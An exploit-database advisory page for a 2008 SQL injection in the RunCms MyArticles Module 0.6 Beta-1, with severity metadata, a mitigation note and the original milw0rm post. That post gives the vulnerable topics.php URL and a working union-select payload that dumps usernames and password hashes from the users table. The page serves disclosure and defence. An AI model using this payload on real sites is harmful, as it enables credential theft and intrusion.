header-logo
Suggest Exploit
vendor:
RunCms MyArticles Module
by:
Cr@zy_King / crazy_kinq@hotmail.co.uk
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: RunCms MyArticles Module
Affected Version From: 0.6 Beta-1
Affected Version To: 0.6 Beta-1
Patch Exists: YES
Related CWE: N/A
CPE: a:runcms:runcms_myarticles_module
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

RunCms MyArticles Module 0.6 Beta-1 Remote Sql Injection

RunCms MyArticles Module 0.6 Beta-1 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Upgrade to the latest version of RunCms MyArticles Module.
Source

Exploit-DB raw data:

Cr@zy_King / crazy_kinq@hotmail.co.uk

' ¿? seLçuK abim1z qururumuzsun altın kemer Trabzonun !..

K1 World Champions Selçuk Aydın The Best Of , Number One ;)

RunCms MyArticles Module 0.6 Beta-1 Remote Sql İnj.

Down : https://sourceforge.net/project/showfiles.php?group_id=155086&package_id=212714&release_id=466097

Sql : http://localhost/modules/myarticles/topics.php?op=listarticles&topic_id=Sql.

Sql : -2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users

Bütün Türkiye'ye Ve Dünya'ya Selam oLsun aLtın Kemer Trabzonun !

http://coderx.org and http://scriptlife.org 

# milw0rm.com [2008-04-26]